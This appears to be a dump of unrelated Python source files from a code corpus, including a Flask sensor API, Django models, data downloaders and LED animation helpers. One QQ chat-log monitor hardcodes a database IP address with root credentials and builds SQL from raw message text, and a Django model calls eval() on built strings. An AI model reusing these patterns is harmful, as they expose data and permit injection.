return [ key for key in dict_a if dict_a[key] != dict_b[key]]
dict_a = to_dict(A)
dict_b = to_dict(B)
differences = look_for_differences(dict_a, dict_b)
print(' '.join(map(str,differences))) |
22,054 | 4410dde9038afdd9eda3356ce4ad91fa8c0a6de5 | def arr(n):
from collections import Counter
d=Counter(n)
x=[]
for i in d:
if d[i]==2:
x.append(i)
return len(x)
print(arr(['tom','jerry','doramon','jerry','rat','tom','rat','rat']))
|
22,055 | 681e74391cf8e20280217b50127769437fb8ad01 | import numpy as np
import argparse
from standards import *
import loc_utils as lut
parser = argparse.ArgumentParser()
parser.add_argument('x', help='puts 3 predictors separated by "/" into the data table')
parser.add_argument('-s', '--save_to', help='pickles and saves preprocessed data to path provided')
parser.add_argument('-o', '--output_df', help='prints a pandas DF to stdout', action='store_true')
ARGS = parser.parse_args()
def main():
s = SURix()
data = lut.unpickle('open_loop_data/SUR_data_2.pkl')
data = lut.unpickle('open_loop_data/temp.pkl') # TODO delete later
# Separate data of each batch (group x condition)
sep_data = [] # order: 0,0; 0,1; 1,0; 1,1
for grp_ind in [0,1]:
for cnd_ind in [0,1]:
bix = np.all([
data[:, s.ix('group')] == grp_ind,
data[:, s.ix('cond')] == cnd_ind
], axis=0)
sep_data.append(data[bix,:])
# 1. For each subject and each **TASK** within a subject, add a y value encoding whether their free trial choice
# was the same as the **TASK**.
# 2. Reorder each batch by task
for i, grp in enumerate(sep_data):
y = np.array([grp[:, s.ix('task')]==grp[:, s.ix('choice')]])
aug = np.concatenate([grp, y.reshape(-1, 1)], axis=1)
ordix = np.argsort(aug[:, s.ix('task')])
sep_data[i] = aug[ordix]
s.cols.append('y')
num_rows = np.sum([grp.shape[0] for grp in sep_data])
X = np.zeros([num_rows, 48])
tasks = lut.get_unique(data, s.ix('task'))
start = 0
x1, x2, x3 = ARGS.x.split(sep='/')
for i, grp in enumerate(sep_data):
for j, tsk in enumerate(tasks):
mask = lut.get_mask(grp, {s.ix('task'): tsk})
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+0] = grp[mask, s.ix(x1)]
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+1] = grp[mask, s.ix(x2)]
X[start:int(start + grp.shape[0] / len(tasks)), i*12+j*3+2] = grp[mask, s.ix(x3)]
start += int(grp.shape[0] / len(tasks))
Y = np.concatenate([d[:, -1] for d in sep_data], axis=0).reshape(-1, 1)
print(Y)
D = np.concatenate([Y, np.ones_like(Y), X], axis=1)
c = ['Y', 'const']
for grp in ['F', 'S']:
for cnd in ['I+', 'I-']:
for tsk in ['1D', 'I1D', '2D', 'R']:
for iv in ['PC', 'LP', 'LRN']:
c.append('{}:{}:{}:{}'.format(iv,tsk,cnd,grp))
if ARGS.save_to: lut.dopickle(ARGS.save_to, D)
if ARGS.output_df: lut.print_arr(D, c, nonints=c[1:], round_=2)
if __name__=='__main__': main() |
22,056 | a4238ecca3288b9499c7e740e4772ca676cc2e86 | from musics.models import Music
from musics.serializers import musicSerializer
from rest_framework import viewsets
# Authentications
from rest_framework.permissions import IsAuthenticated
# Parser
from rest_framework.parsers import JSONParser
from rest_framework import status
from rest_framework.response import Response
from django.shortcuts import get_object_or_404
from rest_framework.decorators import detail_route, list_route
# Create your views here.
class MusicViewSet(viewsets.ModelViewSet):
queryset = Music.objects.all()
serializer_class = musicSerializer
# DRF Authentications
permission_classes = (IsAuthenticated,)
# Allowed content type
# local setting (just in this class)
# parser_classes = (JSONParser,)
# /api/music/{pk}/detail/
# @detail_route(methods=['get'], url_path='detail_self')
@detail_route(methods=['get'])
def detail(self, request, pk=None):
music = get_object_or_404(Music, pk=pk)
result = {
'singer': music.singer,
'song': music.song
}
return Response(result, status=status.HTTP_200_OK)
@list_route(methods=['get'])
def all_singer(self, request):
music = Music.objects.values_list('singer', flat=True).distinct()
return Response(music, status=status.HTTP_200_OK)
|
22,057 | 9841b87f9f5c6b197d8ca6fa185490e74f8a3857 | refresh = 43200
version = 20161106.01
urls = ['http://www.motors-dz.com/']
regex = [r'^https?:\/\/[^\/]*motors-dz\.com']
videoregex = []
liveregex = [] |
22,058 | 752d6331fd19be10df3ac63348c4b22c0de6cd2b | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrderBottom(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
ans, level = [], [root]
while root and level:
ans.append([n.val for n in level])
next_level = [(n.left, n.right) for n in level]
level = [leaf for LR in next_level for leaf in LR if leaf]
return ans[::-1] |
22,059 | 8792ff4df0286f97f5579ad775a9453d06c94ea9 | import logging
import math
from typing import Callable, Dict, List, Tuple, Union, NamedTuple
import numpy as np
from collections import defaultdict
class Choice(NamedTuple):
flavors: List[int]
max_depth: int
index: Tuple[int, int]
def generate_choices(top_layer: np.ndarray, curr_level: np.ndarray) -> List[Choice]:
res = list()
for i in range(top_layer.shape[0] - 1):
for j in range(top_layer.shape[1] - 1):
cur = list()
max_depth = -1
for x in range(2):
for y in range(2):
max_depth = max(max_depth, curr_level[i + x][j + y])
if max_depth == -1:
continue
for x in range(2):
for y in range(2):
if max_depth == curr_level[i + x][j + y]:
cur.append(top_layer[i + x][j + y])
res.append(Choice(cur, max_depth, (i, j)))
return res
def choose_next_player(now_turn: int, possible_players: List[int], served_situation: List[Dict[int, int]],
top_layer: np.ndarray, curr_level: np.ndarray, rng: np.random.Generator,
player_idx: int, my_flavor_preference: List[int], total_players: int) -> int:
if len(possible_players) == 1:
return possible_players[0]
# if now_turn = 0, it means for the first turn, we just randomly choose a person to pass to
if now_turn == 0 and len(possible_players) != 0:
return rng.choice(possible_players)
# if there are no candidates, which means our team is the last one to serve
if len(possible_players) == 0:
possible_players = [i for i in range(total_players) if i != player_idx]
choices = generate_choices(top_layer, curr_level)
# if all ice cream has been taken
if len(choices) == 0:
return rng.choice(list(possible_players))
greedy_flavor_preference = defaultdict(list)
for player_index in possible_players:
player_served_situation = sorted(served_situation[player_index].items(), key=lambda item: -item[1])
for flavor, _ in player_served_situation:
greedy_flavor_preference[player_index].append(flavor)
max_score = -math.inf
next_player_list = []
total_units = 24
# test weighted = 0.01, 0.1, 0.5, 0.8, 1 and find the performance of 0.5 is the best
# although I don't know why, but I guess we can test it for several rounds later
weighted = 0.5
for player_index, flavor_preference in greedy_flavor_preference.items():
score_list = []
for choice in choices:
score_list.append((score(choice, flavor_preference), len(choice.flavors)))
score_list.sort(key=lambda x: -x[0])
remain = total_units
player_max_score = 0
for score_num, count in score_list:
if remain - count < 0:
break
remain -= count
player_max_score += score_num
player_max_score = player_max_score / (total_units - remain) \
+ weighted * difference(my_flavor_preference, flavor_preference)
if max_score < player_max_score:
max_score = player_max_score
next_player_list = [player_index]
elif max_score == player_max_score:
next_player_list.append(player_index)
# if len(next_player_list) == 1, just return,
# if the length is larger than 1, we may choose randomly choose a from the set
if len(next_player_list) == 1:
return list(next_player_list)[0]
return rng.choice(list(next_player_list))
# copy from the below f function
def score(choice: Choice, flavor_preference) -> float:
res = 0
for flavor in choice.flavors:
res -= flavor_preference.index(flavor)
res /= len(choice.flavors)
res += choice.max_depth * 0.2
res += 0.01 * len(choice.flavors)
return res
def difference(my_flavor_preference: List[int], other_flavor_preference: List[int]) -> float:
sum_difference = 0.0
for i, flavor in enumerate(my_flavor_preference):
other_i = other_flavor_preference.index(flavor)
sum_difference += abs(i - other_i)
return sum_difference / len(my_flavor_preference)
class Player:
def __init__(self, flavor_preference: List[int], rng: np.random.Generator, logger: logging.Logger) -> None:
self.flavor_preference = flavor_preference
self.rng = rng
self.logger = logger
self.state = [0]
group_id = 1
self.group_id = group_id - 1
def serve(self, top_layer: np.ndarray, curr_level: np.ndarray, player_idx: int,
get_flavors: Callable[[], List[int]], get_player_count: Callable[[], int],
get_served: Callable[[], List[Dict[int, int]]], get_turns_received: Callable[[], List[int]]
) -> Dict[str, Union[Tuple[int, int], int]]:
remain = 24 - self.state[-1]
choices = generate_choices(top_layer, curr_level)
choices = list(filter(lambda x: len(x.flavors) <= remain, choices))
self.logger.info(choices)
if not choices:
turns = get_turns_received()
total_players = get_player_count()
players = list()
for idx, turn in enumerate(turns):
if turn == min(turns) and idx != player_idx:
players.append(idx)
self.state.append(0)
# if we choose the person with the highest score
next_player = choose_next_player(min(turns), players, get_served(), top_layer, curr_level, self.rng,
player_idx, self.flavor_preference, total_players)
return dict(action="pass", values=next_player)
# if we just randomly choose one person
# if len(players) == 0:
# players = [i for i in range(total_players) if i != player_idx]
# return dict(action="pass", values=self.rng.choice(players))
def f(choice: Choice) -> float:
res = 0
for flavor in choice.flavors:
res -= self.flavor_preference.index(flavor)
res /= len(choice.flavors)
# it seems that max_depth does have a positive impact on scoring after testing,
# but we should still test weight = 0.2
res += choice.max_depth * 0.2
res += 0.01 * len(choice.flavors)
return res
choice = max(choices, key=f)
self.state[-1] += len(choice.flavors)
return dict(action='scoop', values=choice.index)
|
22,060 | 46ba92b079b300b390a868ae71482419ebb82742 | #!/usr/bin/python
# encoding=utf-8
import MySQLdb
from subprocess import Popen, PIPE
import sys
logFile = '~/webqq.log'
def format_data(data):
try:
idx = data.find('[info]')
if idx == -1:
dt = data[1:18]
msg = data[20:]
msg = msg.replace('[36m', '').replace('[0m', '').strip()
if msg.find('群消息') == 2:
msg = msg[14:]
grp_person = msg.split('|')
person = grp_person[0]
if grp_person[1]:
gp = grp_person[1].split(':')
if gp:
grp = gp[0]
if gp[1]:
msg = gp[1]
else:
msg = ''
return [dt, grp, person, msg]
else:
return []
else:
return []
else:
return []
else:
return []
except:
print(">>>> %s " % data)
return []
def gen_sql(data):
if data:
d = data
return "insert into qqmsg (msg_dt,grp,member, msg) values('{0}','{1}','{2}','{3}')".format(d[0], d[1], d[2], d[3])
else:
return None
def exec_sql(sql):
# Open database connection
db = MySQLdb.connect("47.98.56.206", "root", "123456", "immsg", charset='utf8')
# prepare a cursor object using cursor() method
cursor = db.cursor()
try:
cursor.execute(sql)
db.commit()
except:
print('Err on commit to database !!')
db.rollback()
db.close()
def monitor_log(log):
reload(sys)
sys.setdefaultencoding('utf8')
p = Popen('tail -3f ' + log, stdout=PIPE, stderr=PIPE, shell=True)
pid = p.pid
print("Popen pid: %s" % str(pid))
while True:
line = p.stdout.readline()
if line:
data = format_data(line)
if data:
# print(data)
sql = gen_sql(data)
if sql:
exec_sql(sql)
else:
print('No data is received!!')
if __name__ == '__main__':
monitor_log(logFile)
|
22,061 | 3b86f1f3c6a834c8de52968c20481fffb9eda388 |
print ("hi welcome to my bookshop!")
print ("/n")
running=True
while running==True:
print ("1 add a book title.")
print ("2 edit an existing book title.")
print ("3 delete a book title.")
print ("4 end the programme.")
command=input ("please enter 1, 2, 3, or bye" ,)
if command==("1"):
print ("please enter what book title you want to add")
elif command==("2"):
print("please enter the book title you want to edit")
elif command==("3"):
print ("please enter the book title you want to delete")
elif command==("4"):
print ("goodbye")
running=False
else:
print ("you didnt enter anything please enter what you want to do")
|
22,062 | c8c740d29298f4ea38a2c572a0f6b246134c28c1 | from hashlib import new
from django.db import models
from datetime import datetime
from django.contrib.auth.models import User, auth
from django.forms.models import ModelFormOptions, model_to_dict
import random
# Create your models here.
# python manage.py makemigrations
# python manage.py migrate
# python manage.py runserver
class topic(models.Model):
topic_name = models.CharField(max_length=255)
class exercise(models.Model):
name = models.CharField(max_length=255)
description = models.TextField()
image = models.ImageField(upload_to='media/exercise_icon', null=True)
topic = models.ForeignKey(topic, on_delete=models.CASCADE, null=True)
created_date = models.DateField(auto_now=True, auto_now_add=False)
created_by = models.ForeignKey(User, on_delete=models.CASCADE)
class condition(models.Model):
key = models.CharField(max_length=15, null=True)
limit = models.IntegerField(null=True)
query = models.CharField(max_length=255)
class question_element(models.Model):
label = models.CharField(max_length=255)
key = models.CharField(max_length=255)
symbol = models.CharField(max_length=255)
nature = models.CharField(max_length=255)
data_type = models.CharField(max_length=255)
value = models.CharField(max_length=255)
is_random = models.BooleanField(default=False)
conditions = models.ManyToManyField(condition, null=True)
example_value = models.CharField(max_length=255)
def get_joined_condition_list(self):
condition_list = self.conditions.all()
new_list = []
for i in condition_list:
single_string = f'NUMBER {i.key} {i.limit}'
new_list.append(single_string)
condition_string = " and ".join(new_list)
return condition_string
class question(models.Model):
title = models.CharField(max_length=255)
description = models.TextField()
topic = models.ForeignKey(topic, on_delete=models.CASCADE, null=True)
exercise = models.ForeignKey(exercise, on_delete=models.CASCADE, null=True)
question_elements = models.ManyToManyField(question_element)
criteria = models.CharField(max_length=255, null=True)
loop = models.IntegerField(null=True)
success_message = models.TextField(null=True)
failure_message = models.TextField(null=True)
is_completed = models.BooleanField(default=False)
created_by = models.ForeignKey(User, on_delete=models.CASCADE, null=True)
def get_correct_random_value(self, condition):
temp_con = ""
while True:
random_value = random.randint(0, 500)
temp_con = condition.replace("NUMBER", str(random_value))
if eval(temp_con):
return random_value
def get_question_versions(self):
container = []
for i in range(self.loop):
data = {'s_no': i+1}
temp_expression = self.criteria
for single_question_element in self.question_elements.all():
if single_question_element.is_random:
my_all_conditions = single_question_element.get_joined_condition_list()
value = self.get_correct_random_value(my_all_conditions)
# print(value)
# for single_condition in single_question_element.conditions.all():
# print(i + 1)
# my_condition = model_to_dict(single_condition)
# whole_query = f'{} {my_condition['key']} {my_condition['limit']}'
# print(my_condition)
else:
value = single_question_element.value if single_question_element.value else f'{single_question_element.symbol}?'
temp_expression = temp_expression.replace(
single_question_element.symbol,
str(value)
)
data['expression'] = temp_expression
container.append(data)
return container
# print(container)
|
22,063 | 2cdc643be8d2f845ca09a8c2b1b6c5948b0b5526 | import argparse
import re
from datetime import datetime
from cli.models.models import CliData, PHONE, LOGIN, PASSWORD, SIP_DEVICE, \
SIP_ENABLED, IDENTIFY_LINE
from cli.utils.help_message import *
CHOICE_FILTER = ['all', 'activate', 'deactivate']
CHOICE_ACTION = ['a', 'd']
CHOICE_VIEW = [PHONE, LOGIN, PASSWORD, SIP_DEVICE, SIP_ENABLED, IDENTIFY_LINE]
class NumsAction(argparse.Action):
"""
A class for extended handler input nums, it converts bash-string
separated by spaces or \n in the list.
"""
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(NumsAction, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, re.split('\n| ', values))
def arg_parse() -> CliData:
time_fmt = "%Y-%m-%d_%H-%M"
timestamp = datetime.strftime(datetime.now(), format=time_fmt)
filename = f'vats_{timestamp}.xlsx'
arg_engine = argparse.ArgumentParser(prog='cli')
arg_engine.add_argument("-f",
type=str,
nargs='?',
const=filename,
default=None,
dest='filename',
help=HELP_F)
arg_engine.add_argument("-l",
action="store_false",
dest='display',
help=HELP_L)
arg_engine.add_argument("-v",
type=str,
nargs='+',
help=HELP_V,
default=['all', ],
dest='view',
choices=CHOICE_VIEW)
arg_engine.add_argument("--action",
type=str,
nargs='+',
default=None,
dest='action',
choices=CHOICE_ACTION,
help=HELP_ACTION)
arg_engine.add_argument("--login",
type=str,
dest='login',
required=True,
help=HELP_LOGIN)
arg_engine.add_argument("--nums",
type=str,
nargs='+',
dest="nums",
action=NumsAction,
help=HELP_NUMS)
arg_engine.add_argument("--filter",
nargs='?',
default='all',
dest='filter',
choices=CHOICE_FILTER,
help=HELP_FILTER)
args = arg_engine.parse_args()
cli_data = CliData(**vars(args))
return cli_data
|
22,064 | 8982a9eb8b55e1acb294ab4f5c05ba042eb86608 | # -*- coding: utf-8 -*-
from pyfcm import FCMNotification
from sensorsapi import app
from models import *
from flask import jsonify, request, render_template, url_for, redirect
import os
@app.route('/', methods=['GET'])
def index():
return redirect(url_for('list_entries'))
@app.route('/api/entries', methods=['GET'])
def get_entries():
entries = []
for entry in SensorsEntry.query.order_by(SensorsEntry.timestamp.asc()):
entries.append(entry.export_data())
return jsonify({'entries': entries})
@app.route('/api/latest', methods=['GET'])
def get_latest_entries():
last_entries = []
for entry in SensorsEntry.query.order_by(SensorsEntry.timestamp.desc()).limit(10):
last_entries.append(entry.export_data())
return jsonify({'entries': last_entries})
@app.route('/api/entries/<id>', methods=['GET'])
def get_entry(id):
return jsonify(SensorsEntry.query.get_or_404(id).export_data())
@app.route('/api/entries', methods=['POST'])
def post_entry():
entry = SensorsEntry()
entry.import_data(request.json)
authorized_serial_no = Device.authorize(entry.credentials)
if authorized_serial_no:
entry.device_serial_no = authorized_serial_no
db.session.add(entry)
db.session.commit()
notify_user_about_entry(entry)
return jsonify(entry.export_data()), 201
@app.route('/entries', methods=['GET'])
def list_entries():
last_entries = SensorsEntry.query.order_by(SensorsEntry.timestamp.desc()).limit(10)
all_entries = SensorsEntry.query.order_by(SensorsEntry.timestamp.desc())
return render_template('index.html', last_entries=last_entries, all_entries=all_entries)
@app.route('/api/notify', methods=['POST'])
def send_warning():
data = request.json
push_service = FCMNotification(api_key=os.environ['FCM_KEY'])
credentials = Credentials(serial_no=data['serial_no'], password=data['password'])
authorized_serial_no = Device.authorize(credentials)
if authorized_serial_no:
result = push_service.notify_topic_subscribers(tag=2, topic_name="warnings", color="#E64A19",
message_body=data['message_body'],
message_title="Warning!")
return jsonify(result), 200
def notify_user_about_entry(entry):
temperature_string = 'Temperature: {0} ℃'.format(round(entry.temperature, 2))
humidity_string = 'Humidity: {0}%'.format(round(entry.humidity, 1))
push_service = FCMNotification(api_key=os.environ['FCM_KEY'])
result = push_service.notify_topic_subscribers(tag=1, topic_name="warnings", color="#009688",
message_body=humidity_string,
message_title=temperature_string)
return result
def test_notification(temp, hum):
entry = SensorsEntry()
entry.humidity = hum
entry.temperature = temp
result = notify_user_about_entry(entry)
print result |
22,065 | ccf77bec7abc57741d2ca09921cce6bd26b51474 | ones=0
zeroes=0
st=input()
for i in st:
if i=='0' in st:
zeroes+=1
elif i=='1' in st:
ones+=1
print(ones)
print(zeroes)
|
22,066 | 77e48d225de2f0fe225b61273109f3f31dcc72f4 | from .base_page import BasePage
from .locators import BasePageLocators, BasketPageLocators
class BasketPage(BasePage):
def should_be_cart_button(self):
assert self.is_element_present(*BasePageLocators.CART_LINK), "Cart button is not presented"
def should_not_be_item_cart(self):
assert self.is_not_element_present(*BasketPageLocators.BASKET_ITEMS), \
"The basket is not empty"
def should_be_text_item_cart(self):
assert self.is_element_present(*BasketPageLocators.TEXT_NOT_ITEM_BASKET), \
"Success text is presented, but should not be"
|
22,067 | 8471574e82e50abfda32a12871ae893eb333758d | """
A set of convenience functions to download datasets for illustrative examples
"""
import urllib
import pandas as pd
import os
import shutil
import tempfile
import itertools
import numpy as np
from scipy.misc import comb
def fetch_tikhonov_data(dpath='/tmp/glm-tools'):
"""
Downloads data for Tikhonov example and returns data frames
Parameters
----------
dpath: str
specifies path to which the data files should be downloaded
Returns
-------
fixations_df: DataFrame
data frame with fixation event data
probes_df: DataFrame
data frame with stimulus probe event data
spikes_df: DataFrame
data frame with spike count data
"""
if os.path.exists(dpath):
shutil.rmtree(dpath)
os.mkdir(dpath)
base_url = "https://raw.githubusercontent.com/glm-tools/datasets/master"
url = os.path.join(base_url, "tikhonov/fixations.csv")
fname = os.path.join(dpath, 'fixations.csv')
urllib.urlretrieve(url, fname)
fixations_df = pd.read_csv(fname)
url = os.path.join(base_url, "tikhonov/probes.csv")
fname = os.path.join(dpath, 'probes.csv')
urllib.urlretrieve(url, fname)
probes_df = pd.read_csv(fname)
url = os.path.join(base_url, "tikhonov/spiketimes.csv")
fname = os.path.join(dpath, 'spiketimes.csv')
urllib.urlretrieve(url, fname)
spikes_df = pd.read_csv(fname, header=None)
return fixations_df, probes_df, spikes_df
def fetch_community_crime_data(dpath='/tmp/glm-tools'):
"""
Downloads data for the community crime example,
removes missing values, extracts features, and
returns numpy arrays
Parameters
----------
dpath: str
specifies path to which the data files should be downloaded
Returns
-------
X: numpy array
(n_samples x n_features)
y: numpy array
(n_samples,)
"""
if os.path.exists(dpath):
shutil.rmtree(dpath)
os.mkdir(dpath)
fname = os.path.join(dpath, 'communities.csv')
base_url = ("http://archive.ics.uci.edu/ml/machine-learning-databases")
url = os.path.join(base_url, "communities/communities.data")
urllib.urlretrieve(url, fname)
# Read in the file
df = pd.read_csv('/tmp/glm-tools/communities.csv', header=None)
# Remove missing values
df.replace('?', np.nan, inplace=True)
df.dropna(inplace=True, axis=1)
df.dropna(inplace=True, axis=0)
df.reset_index(inplace=True, drop=True)
# Extract predictors and target from data frame
X = np.array(df[df.keys()[range(3, 102)]])
y = np.array(df[127])
return X, y
def fetch_group_lasso_datasets():
"""
Downloads and formats data needed for the group lasso example.
Returns:
--------
design_matrix: pandas.DataFrame
pandas dataframe with formatted data and labels
groups: list
list of group indicies, the value of the ith position in the list
is the group number for the ith regression coefficient
"""
# helper functions
def find_interaction_index(seq, subseq,
alphabet="ATGC",
all_possible_len_n_interactions=None):
n = len(subseq)
alphabet_interactions = \
[set(p) for
p in list(itertools.combinations_with_replacement(alphabet, n))]
num_interactions = len(alphabet_interactions)
if all_possible_len_n_interactions is None:
all_possible_len_n_interactions = \
[set(interaction) for
interaction in
list(itertools.combinations_with_replacement(seq, n))]
subseq = set(subseq)
group_index = num_interactions * \
all_possible_len_n_interactions.index(subseq)
value_index = alphabet_interactions.index(subseq)
final_index = group_index + value_index
return final_index
def create_group_indicies_list(seqlength=7,
alphabet="ATGC",
interactions=[1, 2, 3],
include_extra=True):
alphabet_length = len(alphabet)
index_groups = []
if include_extra:
index_groups.append(0)
group_count = 1
for inter in interactions:
n_interactions = comb(seqlength, inter)
n_alphabet_combos = comb(alphabet_length,
inter,
repetition=True)
for x1 in range(int(n_interactions)):
for x2 in range(int(n_alphabet_combos)):
index_groups.append(int(group_count))
group_count += 1
return index_groups
def create_feature_vector_for_sequence(seq,
alphabet="ATGC",
interactions=[1, 2, 3]):
feature_vector_length = \
sum([comb(len(seq), inter) *
comb(len(alphabet), inter, repetition=True)
for inter in interactions]) + 1
feature_vector = np.zeros(int(feature_vector_length))
feature_vector[0] = 1.0
for inter in interactions:
# interactions at the current level
cur_interactions = \
[set(p) for p in list(itertools.combinations(seq, inter))]
interaction_idxs = \
[find_interaction_index(
seq, cur_inter,
all_possible_len_n_interactions=cur_interactions) + 1
for cur_inter in cur_interactions]
feature_vector[interaction_idxs] = 1.0
return feature_vector
positive_url = \
"http://genes.mit.edu/burgelab/maxent/ssdata/MEMset/train5_hs"
negative_url = \
"http://genes.mit.edu/burgelab/maxent/ssdata/MEMset/train0_5_hs"
pos_file = tempfile.NamedTemporaryFile() #bufsize=0)
neg_file = tempfile.NamedTemporaryFile() #bufsize=0)
posreq = urllib.request.Request(positive_url)
with urllib.request.urlopen(posreq) as posresponse:
pos_page = posresponse.read().decode("utf-8")
negreq = urllib.request.Request(negative_url)
with urllib.request.urlopen(negreq) as negresponse:
neg_page = negresponse.read().decode("utf-8")
positive_sequences = [str(line.strip().upper()) for idx, line in
enumerate(pos_page.strip().split('\n'))
if ">" not in line and idx < 2 * 8000]
negative_sequences = [str(line.strip().upper()) for idx, line in
enumerate(neg_page.strip().split('\n'))
if ">" not in line and
idx < 2 * len(positive_sequences)]
assert len(positive_sequences) == len(negative_sequences), \
"lengths were not the same: p={pos} n={neg}" \
.format(pos=len(positive_sequences), neg=len(negative_sequences))
positive_vector_matrix = np.array([create_feature_vector_for_sequence(s)
for s in positive_sequences])
negative_vector_matrix = np.array([create_feature_vector_for_sequence(s)
for s in negative_sequences])
df = pd.DataFrame(data=np.vstack((positive_vector_matrix,
negative_vector_matrix)))
df.loc[0:positive_vector_matrix.shape[0], "Label"] = 1.0
df.loc[positive_vector_matrix.shape[0]:, "Label"] = 0.0
design_matrix = df
groups = create_group_indicies_list()
return design_matrix, groups
if __name__ == '__main__':
fetch_group_lasso_datasets() |
22,068 | c168147d1fdced211541104bd0bbb9c50897b892 | from typing import Mapping, Optional, Set, Callable
from abc import abstractmethod
from algorithms.tabular_base import TabularBase
from processes.mdp_rep_for_rl_tabular import MDPRepForRLTabular
from processes.policy import Policy
from processes.det_policy import DetPolicy
from algorithms.helper_funcs import get_vf_dict_from_qf_dict_and_policy
from algorithms.helper_funcs import get_uniform_policy
from algorithms.helper_funcs import get_det_policy_from_qf_dict
from algorithms.helper_funcs import get_epsilon_decay_func
from utils.generic_typevars import S, A
from utils.standard_typevars import VFDictType, QFDictType
class RLTabularBase(TabularBase):
def __init__(
self,
mdp_rep_for_rl: MDPRepForRLTabular,
exploring_start: bool,
softmax: bool,
epsilon: float,
epsilon_half_life: float,
num_episodes: int,
max_steps: int
) -> None:
self.mdp_rep: MDPRepForRLTabular = mdp_rep_for_rl
self.exploring_start: bool = exploring_start
self.softmax: bool = softmax
self.epsilon_func: Callable[[int], float] = get_epsilon_decay_func(
epsilon,
epsilon_half_life
)
self.num_episodes: int = num_episodes
self.max_steps: int = max_steps
def get_state_action_dict(self) -> Mapping[S, Set[A]]:
return self.mdp_rep.state_action_dict
def get_init_policy(self) -> Policy:
return get_uniform_policy(self.mdp_rep.state_action_dict)
def get_value_func_dict(self, pol: Policy) -> VFDictType:
return get_vf_dict_from_qf_dict_and_policy(
self.get_qv_func_dict(pol),
pol
)
@abstractmethod
def get_qv_func_dict(self, pol: Optional[Policy]) -> QFDictType:
pass
def get_act_value_func_dict(self, pol: Policy) -> QFDictType:
return self.get_qv_func_dict(pol)
def get_optimal_det_policy(self) -> DetPolicy:
return get_det_policy_from_qf_dict(self.get_qv_func_dict(None))
|
22,069 | 04286c74a58b96dfd1dcc7dbe2bb4da4b121abd9 | import libadalang as lal
u = lal.AnalysisContext().get_from_file("test.adb")
assert not u.diagnostics
u_decl = u.root.find(lal.TypeDecl)
print("Declaration of U => {}".format(u_decl))
print(" get_pragma ('pack') => {}".format(u_decl.p_get_pragma('pack')))
print('')
u_decl = u.root.find(lal.DottedName).p_referenced_decl()
print("Declaration of U with rebindings of Pkg_I => {}".format(u_decl))
print(" get_pragma ('pack') => {}".format(u_decl.p_get_pragma('pack')))
print('')
print('Done')
|
22,070 | fdf5664476977b778eb72c772fd5e19afc05cf8a | import numpy as np
from config import *
def bottom_up(m, channel):
'''
Creates a mask of which leds to turn on given an amplitude.
This mask lights a strip of LEDs starting at the bottom and reaching higher
with increasing amplitude
Arguments:
m (float): The amplitude in 0 to 1
Returns:
A [LED_1_COUNT x 3] array of zeros and ones
'''
if channel == 1:
num_leds_on = m * LED_1_COUNT
return np.tile(np.arange(LED_1_COUNT) < num_leds_on, (3,1)).T
elif channel == 2:
num_leds_on = m * LED_2_COUNT
return np.tile(np.arange(LED_2_COUNT) < num_leds_on, (3,1)).T
def bottom_upV(m, channel):
'''
Creates a mask of which leds to turn on given an amplitude.
This mask lights a strip of LEDs starting at the bottom and reaching higher
with increasing amplitude
Arguments:
m (float): The amplitude in 0 to 1
Returns:
A [LED_1_COUNT] array of zeros and ones
'''
if channel == 1:
num_leds_on = m * LED_1_COUNT
return np.tile(np.abs(np.arange(LED_1_COUNT/3)) < num_leds_on/3-0.01, (3,1)).T
elif channel == 2:
num_leds_on = m * LED_2_COUNT
return np.tile(np.abs(np.arange(LED_2_COUNT/3)) < num_leds_on/3-0.01, (3,1)).T
def top_down(m, channel):
'''
Creates a mask of which leds to turn on given an amplitude.
This mask lights a strip of LEDs starting at the top and reaching lower
with increasing amplitude
Arguments:
m (float): The amplitude in 0 to 1
Returns:
A [LED_1_COUNT x 3] array of zeros and ones
'''
if channel == 1:
num_leds_on = m * LED_1_COUNT
return np.tile(LED_1_COUNT - np.arange(LED_1_COUNT) < num_leds_on, (3,1)).T
elif channel == 2:
num_leds_on = m * LED_2_COUNT
return np.tile(LED_2_COUNT - np.arange(LED_2_COUNT) < num_leds_on, (3,1)).T
def middle_out(m, channel):
'''
Creates a mask of which leds to turn on given an amplitude.
This mask lights a strip of LEDs starting at the middle and reaching out
with increasing amplitude
Arguments:
m (float): The amplitude in 0 to 1
Returns:
A [LED_1_COUNT x 3] array of zeros and ones
'''
if channel == 1:
num_leds_on = m * LED_1_COUNT
return np.tile(np.abs(LED_1_COUNT/2.0 - np.arange(LED_1_COUNT)) < num_leds_on/2., (3,1)).T
elif channel == 2:
num_leds_on = m * LED_2_COUNT
return np.tile(np.abs(LED_2_COUNT/2.0 - np.arange(LED_2_COUNT)) < num_leds_on/2., (3,1)).T
def clamp(m, channel):
'''
Creates a mask of which leds to turn on given an amplitude.
This mask lights a strip of LEDs starting at the top and bottom and reaching towards
the middle with increasing amplitude
Arguments:
m (float): The amplitude in 0 to 1
Returns:
A [LED_1_COUNT x 3] array of zeros and ones
'''
if channel == 1:
num_leds_on = (1. - m) * LED_1_COUNT
return 1 - np.tile(np.abs(LED_1_COUNT/2.0 - np.arange(LED_1_COUNT)) < num_leds_on/2., (3,1)).T
elif channel == 2:
num_leds_on = (1. - m) * LED_2_COUNT
return 1 - np.tile(np.abs(LED_2_COUNT/2.0 - np.arange(LED_2_COUNT)) < num_leds_on/2., (3,1)).T
|
22,071 | 4ffa251ec808b2bc56225b7ef3f50cf9747cde85 | def A(a,b):
if a < b:
return 0
else:
return A(a-b,b) +1
a = 27
b = 5
print(A(a,b))
|
22,072 | 3de4374edb8f75fa9069b0889f9e9440f32968de | from PIL import Image
from matplotlib import pyplot
import numpy as np
from scipy.sparse import lil_matrix,csr_matrix
before = Image.open("lena64.bmp")
width,height = before.size
#4段Haar変換を行う
count = 1
#ここでは正方の画像のみを扱うこととし、一辺の長さをNとおきN*Nの画像を扱う
N = height
before_pixels = []
for x in range(height):
matrix = []
for y in range(width):
before_pixels.append([before.getpixel((x,y))])
#変換前の画像を行列計算用の変数に変換
before_matrix = np.matrix(before_pixels)
haar = lil_matrix((N*N,N*N))
#Haar変換を行列にしたものを生成
for i in range(int((N*N)/4)):
